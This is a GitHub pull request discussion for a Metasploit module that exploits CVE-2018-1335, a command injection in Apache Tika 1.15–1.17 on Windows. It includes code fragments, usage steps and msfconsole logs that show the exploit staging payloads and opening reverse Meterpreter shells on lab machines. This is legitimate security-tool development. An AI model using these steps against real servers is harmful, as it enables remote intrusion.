Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Apache Tika CVE-2018-1335 RCE #11653

Merged
merged 7 commits into from Aug 1, 2019

Conversation

@h00die
Copy link
Contributor

commented Mar 29, 2019

Fixes #11556

This module exploits an RCE in Apache Tika v 1.7-1.17.
Its Extremely simple, I simply ported the python module to ruby and the framework.

@DaveYesland if you wanted different attribution in this, let me know.

Install is easy, install java, download the sever jar java -jar <server.jar> -h <ip>.

Verification

  • Start msfconsole
  • use exploits/windows/http/apache_tika_jp2_jscript
  • set rhost
  • expoit
  • Verify you get a shell
  • Document looks good. It's VERY simplistic since @DaveYesland did an AWESOME write-up and everyone should just reference that.
@bcoles

This comment has been minimized.

Copy link
Contributor

commented Mar 29, 2019

I believe @sgonzalez-r7 may have been looking into this, as per #11556

@wvu-r7

This comment has been minimized.

Copy link
Contributor

commented Mar 29, 2019

Yes, @sgonzalez-r7 was assigned and has been working on it. Oops.

'Author' =>
[
'h00die', # msf module
'David Yesland @Daveysec', #edb submission

This comment has been minimized.

Copy link
@wvu-r7

wvu-r7 Mar 29, 2019

Contributor

No Twitter handles yet.

@h00die

This comment has been minimized.

Copy link
Contributor Author

commented Mar 29, 2019

Shoot, I didn't look before leaping. Sorry @sgonzalez-r7

@h00die h00die closed this Mar 29, 2019

@sgonzalez-r7

This comment has been minimized.

Copy link
Contributor

commented Mar 29, 2019

@h00die, I'm a bit bummed. It was gonna be my first Metasploit module. If you closed the PR on my account, please don't. It would be a waste of perfectly good code.

@sgonzalez-r7

This comment has been minimized.

Copy link
Contributor

commented Mar 29, 2019

@h00die, I can even review/land it since I already have the target setup :)

@h00die

This comment has been minimized.

Copy link
Contributor Author

commented Mar 29, 2019

It's NBD. Let's flip it. You make the module and docs, and since I have a test env I can land it! I'm pretty positive you'll come up with something much better and more reliable than what I put together anyways.
Plus, I got to learn powershell integration, so I already got a benefit from writing this.


def exploit
pay = cmd_psh_payload(payload.encoded, payload_instance.arch.first, remove_comspec: true)
pay = pay.gsub(/"/, '\"') # RIP use_single_quote=true

This comment has been minimized.

Copy link
@wvu-r7

wvu-r7 Mar 29, 2019

Contributor

Is this broken?

This comment has been minimized.

Copy link
@h00die

h00die Mar 29, 2019

Author Contributor

There are like 4 modules that have use_single_quote=true. It wasn't in the library, nor did it make a difference in the code. I did see an issue/pr that mentioned it being removed, forgot who did/wrote it though

This comment has been minimized.

Copy link
@wvu-r7

wvu-r7 Mar 29, 2019

Contributor

You mean use_single_quotes?

This comment has been minimized.

Copy link
@wvu-r7

This comment has been minimized.

This comment has been minimized.

Copy link
@h00die

h00die Mar 29, 2019

Author Contributor

yea, forgot the s on the end.
https://github.com/rapid7/metasploit-framework/search?q=use_single_quotes&unscoped_q=use_single_quotes
I saw it passed as a parameter, and in a hash. Tried both, printing to screen and didn't see a difference. Never thought to check rex-powershell since this is my first time working with PSH.
I saw #9132 (comment) and thought it had been removed

This comment has been minimized.

Copy link
@wvu-r7

wvu-r7 Mar 29, 2019

Contributor

Gone in #8728. Try wrap_double_quotes. Might want to fix the regressions introduced.

},
'License' => MSF_LICENSE,
'Privileged' => false,
'Platform' => 'win',

This comment has been minimized.

Copy link
@wvu-r7

wvu-r7 Mar 29, 2019

Contributor

I know this was written for Windows, but is there any reason a Unix system couldn't be targeted?

This comment has been minimized.

Copy link
@h00die

h00die Mar 29, 2019

Author Contributor

Not sure. it calls a .exe on windows and passes params to it. If the .exe equivalent on linux has the same parameters, there's a good chance the flags would match. All the documentation was for windows.
Devils in the details. I thought about getting this written first, then if time permitted (most likely wouldn't) going back to see if it works for additional OSes

This comment has been minimized.

Copy link
@wvu-r7

wvu-r7 Mar 29, 2019

Contributor

Easily tested. I wanted someone to look into that. cc @sgonzalez-r7

This comment has been minimized.

Copy link
@DaveYesland

DaveYesland Mar 29, 2019

I know this was written for Windows, but is there any reason a Unix system couldn't be targeted?

I did a little testing on Unix when working on this and was only able to break out of the command on Windows. The command in the end looks like "injected.exe"originalcommand some args here. The way Windows interprets double quotes is what lets the injection happen. Does not mean it is not possible just what I found.

@wvu-r7

This comment has been minimized.

Copy link
Contributor

commented Mar 29, 2019

@sgonzalez-r7: I've reviewed this lightly. Do with it what you will for your PR. I suggest investigating Unix support.

@h00die

This comment has been minimized.

Copy link
Contributor Author

commented Apr 12, 2019

@sgonzalez-r7 any word on when you'll tika stab at this?

@h00die

This comment has been minimized.

Copy link
Contributor Author

commented Apr 26, 2019

@sgonzalez-r7 ping, just checking in since its been a month, didn't know if this made it to the priority list yet or not

@sgonzalez-r7

This comment has been minimized.

Copy link
Contributor

commented Apr 29, 2019

@h00die , thanks for the ping. I'll be putting this at the to of my priority list this week.

I did try verifying your implementation on a Win 7 VM with no luck. Running check shows as vulnerable, but I'm not able to get a session. I'll keep you updated.

@h00die

This comment has been minimized.

Copy link
Contributor Author

commented Jun 20, 2019

Any more updates @sgonzalez-r7 ? At this point i'm leaning towards re-opening this PR so there's at least something in the framework.

@sgonzalez-r7

This comment has been minimized.

Copy link
Contributor

commented Jun 20, 2019

Go ahead and re-open your PR and run with it.

jrobles-r7 added some commits Jun 26, 2019

Update check
Handle nil error code and fix version extraction based
on both of the possible Apache Tika return pages.
@jrobles-r7

This comment has been minimized.

Copy link
Contributor

commented Jun 27, 2019

I PR-ed a few changes to your branch.

h00die#12

Merge pull request #12 from jrobles-r7/tika
Tika module updates, check and CmdStager
@h00die

This comment has been minimized.

Copy link
Contributor Author

commented Jul 6, 2019

My weak guess on why this isn't working now is either some sort of sandboxing, or the env isn't supporting %TEMP% . I'll look in a few days to see if u can figure it out

@jrobles-r7

This comment has been minimized.

Copy link
Contributor

commented Jul 8, 2019

I tested the changes on Win10 x64 v1703.

@h00die

This comment has been minimized.

Copy link
Contributor Author

commented Jul 16, 2019

Haven't forgotten about this, just wanted to get the hashcat and brocade testing done first

@h00die

This comment has been minimized.

Copy link
Contributor Author

commented Jul 16, 2019

Originally I thought it was a psh thing, I was starting java via PSH, and in that psh if I cd %TEMP% it didn't know what %TEMP% was. Obvi env issue.
However, I used cmd.exe and watched %TEMP% which was now loading, and i'm not seeing any files written at all. Definitely broken on server 2012.

Also tried on my win10 1709, same results. @jrobles-r7 can you re-try this and see if its working for you?

@jrobles-r7

This comment has been minimized.

Copy link
Contributor

commented Jul 22, 2019

@h00die I tested the latest commit on Win10 1803. The module worked for me. I tested with tika launched from cmd.exe and psh. Both were successful.

msf5 exploit(windows/http/apache_tika_jp2_jscript) > exploit

[*] Started reverse TCP handler on 172.22.222.136:4444 
[*] Sending PUT request to 172.22.222.177:9998/meta
[*] Command Stager progress -   8.10% done (7999/98798 bytes)
[*] Sending PUT request to 172.22.222.177:9998/meta
[*] Command Stager progress -  16.19% done (15998/98798 bytes)
[*] Sending PUT request to 172.22.222.177:9998/meta
[*] Command Stager progress -  24.29% done (23997/98798 bytes)
[*] Sending PUT request to 172.22.222.177:9998/meta
[*] Command Stager progress -  32.39% done (31996/98798 bytes)
[*] Sending PUT request to 172.22.222.177:9998/meta
[*] Command Stager progress -  40.48% done (39995/98798 bytes)
[*] Sending PUT request to 172.22.222.177:9998/meta
[*] Command Stager progress -  48.58% done (47994/98798 bytes)
[*] Sending PUT request to 172.22.222.177:9998/meta
[*] Command Stager progress -  56.67% done (55993/98798 bytes)
[*] Sending PUT request to 172.22.222.177:9998/meta
[*] Command Stager progress -  64.77% done (63992/98798 bytes)
[*] Sending PUT request to 172.22.222.177:9998/meta
[*] Command Stager progress -  72.87% done (71991/98798 bytes)
[*] Sending PUT request to 172.22.222.177:9998/meta
[*] Command Stager progress -  80.96% done (79990/98798 bytes)
[*] Sending PUT request to 172.22.222.177:9998/meta
[*] Command Stager progress -  89.06% done (87989/98798 bytes)
[*] Sending PUT request to 172.22.222.177:9998/meta
[*] Command Stager progress -  97.16% done (95988/98798 bytes)
[*] Sending PUT request to 172.22.222.177:9998/meta
[*] Sending stage (179779 bytes) to 172.22.222.177
[*] Command Stager progress - 100.00% done (98798/98798 bytes)
[*] Meterpreter session 2 opened (172.22.222.136:4444 -> 172.22.222.177:49794) at 2019-07-22 10:03:31 -0500

meterpreter > getuid
Server username: DESKTOP-BRHRDI2\msfdev
meterpreter > sysinfo
Computer        : DESKTOP-BRHRDI2
OS              : Windows 10 (Build 17134).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x86/windows
meterpreter > 
@h00die

This comment has been minimized.

Copy link
Contributor Author

commented Jul 25, 2019

Windows 10 (running as admin from cmd) tika 1.14 java 1.80_211 no firewall, no AV:

root@dev:~/metasploit-framework# git checkout upstream/pr/11653
Note: checking out 'upstream/pr/11653'.

You are in 'detached HEAD' state. You can look around, make experimental
changes and commit them, and you can discard any commits you make in this
state without impacting any branches by performing another checkout.

If you want to create a new branch to retain commits you create, you may
do so (now or later) by using -b with the checkout command again. Example:

  git checkout -b <new-branch-name>

HEAD is now at 0d1385d8d5 Merge pull request #12 from jrobles-r7/tika
root@dev:~/metasploit-framework# ./msfconsole 

       =[ metasploit v5.0.14-dev-0d1385d8d5               ]
+ -- --=[ 1870 exploits - 1060 auxiliary - 328 post       ]
+ -- --=[ 546 payloads - 44 encoders - 10 nops            ]
+ -- --=[ 2 evasion                                       ]

[*] Starting persistent handler(s)...
msf5 > use exploit/windows/http/apache_tika_jp2_jscript 
msf5 exploit(windows/http/apache_tika_jp2_jscript) > set rhosts 2.2.2.2
rhosts => 2.2.2.2
msf5 exploit(windows/http/apache_tika_jp2_jscript) > exploit

[*] Started reverse TCP handler on 1.1.1.1:4444 
[*] Sending PUT request to 2.2.2.2:9998/meta
[*] Command Stager progress -   8.10% done (7999/98798 bytes)
[*] Sending PUT request to 2.2.2.2:9998/meta
[*] Command Stager progress -  16.19% done (15998/98798 bytes)
[*] Sending PUT request to 2.2.2.2:9998/meta
[*] Command Stager progress -  24.29% done (23997/98798 bytes)
[*] Sending PUT request to 2.2.2.2:9998/meta
[*] Command Stager progress -  32.39% done (31996/98798 bytes)
[*] Sending PUT request to 2.2.2.2:9998/meta
[*] Command Stager progress -  40.48% done (39995/98798 bytes)
[*] Sending PUT request to 2.2.2.2:9998/meta
[*] Command Stager progress -  48.58% done (47994/98798 bytes)
[*] Sending PUT request to 2.2.2.2:9998/meta
[*] Command Stager progress -  56.67% done (55993/98798 bytes)
[*] Sending PUT request to 2.2.2.2:9998/meta
[*] Command Stager progress -  64.77% done (63992/98798 bytes)
[*] Sending PUT request to 2.2.2.2:9998/meta
[*] Command Stager progress -  72.87% done (71991/98798 bytes)
[*] Sending PUT request to 2.2.2.2:9998/meta
[*] Command Stager progress -  80.96% done (79990/98798 bytes)
[*] Sending PUT request to 2.2.2.2:9998/meta
[*] Command Stager progress -  89.06% done (87989/98798 bytes)
[*] Sending PUT request to 2.2.2.2:9998/meta
[*] Command Stager progress -  97.16% done (95988/98798 bytes)
[*] Sending PUT request to 2.2.2.2:9998/meta
[*] Command Stager progress - 100.00% done (98798/98798 bytes)
[*] Exploit completed, but no session was created.

I tried a fresh checkout from the PR and still, nothing. Tried a messagebox payload, never popped. Checked the %TEMP folder, nothing is being written.

@h00die

This comment has been minimized.

Copy link
Contributor Author

commented Jul 26, 2019

i see about taking a look more this weekend at the difference in the PUT requests to see if its something obvious, or what is going on here

@wchen-r7

This comment has been minimized.

Copy link
Contributor

commented Jul 29, 2019

If you breakpoint on CreateProcess, does it hit at all? If it doesn't, there is something wrong on the Java level. If it does, there is something wrong on the OS level.

I also make that sound very obvious...

@h00die

This comment has been minimized.

Copy link
Contributor Author

commented Jul 29, 2019

Some interesting things during testing.
I used 1.17, and the changes to the module worked.
When I tested the changes before, it was on 1.14 which is marked as vuln.
I also downloaded 1.9 which is marked vuln.

What I'm finding is that this module, and the POC work on 1.17, and 1.17 ONLY. I was unable to get the POC nor this module to work (out of the box) on <1.17 or 1.18 (which isn't vulnerable, so this is expected).
TBH, I don't wish to debug java to determine exactly what the changes are that are effecting this on pre 1.17 versions. The CVE shows <.17 is vuln, but I think at this point it may be worth just adjusting the version check and ONLY showing 1.17 as exploitable (as opposed to vulnerable)

@wchen-r7

This comment has been minimized.

Copy link
Contributor

commented Jul 29, 2019

I think that sounds reasonable.

@DaveYesland

This comment has been minimized.

Copy link

commented Jul 29, 2019

Some interesting things during testing.
I used 1.17, and the changes to the module worked.
When I tested the changes before, it was on 1.14 which is marked as vuln.
I also downloaded 1.9 which is marked vuln.

What I'm finding is that this module, and the POC work on 1.17, and 1.17 ONLY. I was unable to get the POC nor this module to work (out of the box) on <1.17 or 1.18 (which isn't vulnerable, so this is expected).
TBH, I don't wish to debug java to determine exactly what the changes are that are effecting this on pre 1.17 versions. The CVE shows <.17 is vuln, but I think at this point it may be worth just adjusting the version check and ONLY showing 1.17 as exploitable (as opposed to vulnerable)

Was looking into this a bit and looks like you are correct I was able to get the POC to work on 1.16 and 1.17 but not 1.14.

I think the issue is 1.14 does not look like it had support for jp2 which the exploit relies on...

image

@h00die

This comment has been minimized.

Copy link
Contributor Author

commented Jul 30, 2019

confirmed 16 and 15 are exploitable as well, so coverage is 15-17. Lucky guess on 14! Will update the module to accept all that and should be done in an hour or so!

@h00die

This comment has been minimized.

Copy link
Contributor Author

commented Jul 30, 2019

@jrobles-r7 / @wchen-r7 should be ready to go!

@jrobles-r7

This comment has been minimized.

Copy link
Contributor

commented Aug 1, 2019

msf5 exploit(windows/http/apache_tika_jp2_jscript) > check

[*] Apache Tika Version Detected: 1.17
[+] 172.22.222.231:9998 - The target is vulnerable.
msf5 exploit(windows/http/apache_tika_jp2_jscript) > set verbose false
verbose => false
msf5 exploit(windows/http/apache_tika_jp2_jscript) > exploit

[*] Started reverse TCP handler on 172.22.222.136:4444 
[*] Sending PUT request to 172.22.222.231:9998/meta
[*] Command Stager progress -   8.10% done (7999/98798 bytes)
[*] Sending PUT request to 172.22.222.231:9998/meta
[*] Command Stager progress -  16.19% done (15998/98798 bytes)
[*] Sending PUT request to 172.22.222.231:9998/meta
[*] Command Stager progress -  24.29% done (23997/98798 bytes)
[*] Sending PUT request to 172.22.222.231:9998/meta
[*] Command Stager progress -  32.39% done (31996/98798 bytes)
[*] Sending PUT request to 172.22.222.231:9998/meta
[*] Command Stager progress -  40.48% done (39995/98798 bytes)
[*] Sending PUT request to 172.22.222.231:9998/meta
[*] Command Stager progress -  48.58% done (47994/98798 bytes)
[*] Sending PUT request to 172.22.222.231:9998/meta
[*] Command Stager progress -  56.67% done (55993/98798 bytes)
[*] Sending PUT request to 172.22.222.231:9998/meta
[*] Command Stager progress -  64.77% done (63992/98798 bytes)
[*] Sending PUT request to 172.22.222.231:9998/meta
[*] Command Stager progress -  72.87% done (71991/98798 bytes)
[*] Sending PUT request to 172.22.222.231:9998/meta
[*] Command Stager progress -  80.96% done (79990/98798 bytes)
[*] Sending PUT request to 172.22.222.231:9998/meta
[*] Command Stager progress -  89.06% done (87989/98798 bytes)
[*] Sending PUT request to 172.22.222.231:9998/meta
[*] Command Stager progress -  97.16% done (95988/98798 bytes)
[*] Sending PUT request to 172.22.222.231:9998/meta
[*] Sending stage (179779 bytes) to 172.22.222.231
[*] Command Stager progress - 100.00% done (98798/98798 bytes)
[*] Meterpreter session 1 opened (172.22.222.136:4444 -> 172.22.222.231:51086) at 2019-08-01 17:46:53 -0500

meterpreter > getuid
Server username: DESKTOP-BRHRDI2\msfdev
meterpreter > sysinfo
Computer        : DESKTOP-BRHRDI2
OS              : Windows 10 (Build 17134).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x86/windows
meterpreter > 

@jrobles-r7 jrobles-r7 merged commit 060183c into rapid7:master Aug 1, 2019

3 checks passed

Metasploit Automation - Sanity Test Execution Successfully completed all tests.
Details
Metasploit Automation - Test Execution Successfully completed all tests.
Details
continuous-integration/travis-ci/pr The Travis CI build passed
Details

jrobles-r7 added a commit that referenced this pull request Aug 1, 2019

msjenkins-r7 added a commit that referenced this pull request Aug 1, 2019

@jrobles-r7

This comment has been minimized.

Copy link
Contributor

commented Aug 1, 2019

Release Notes

The apache_tika_jp2_jscript module has been added to the framework. It targets CVE-2018-1335 and exploits a command injection vulnerability in Apache Tika v1.15-v1.17 on Windows. The vulnerability occurs when OCR is specified in the request, which allows command line parameters to be passed to the host.

@jrobles-r7

This comment has been minimized.

Copy link
Contributor

commented Aug 1, 2019

Thanks for the contribution and testing @h00die and @DaveYesland

@h00die h00die deleted the h00die:tika branch Aug 4, 2019

@tdoan-r7 tdoan-r7 added the rn-modules label Aug 20, 2019

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Projects
None yet
8 participants
You can’t perform that action at this time.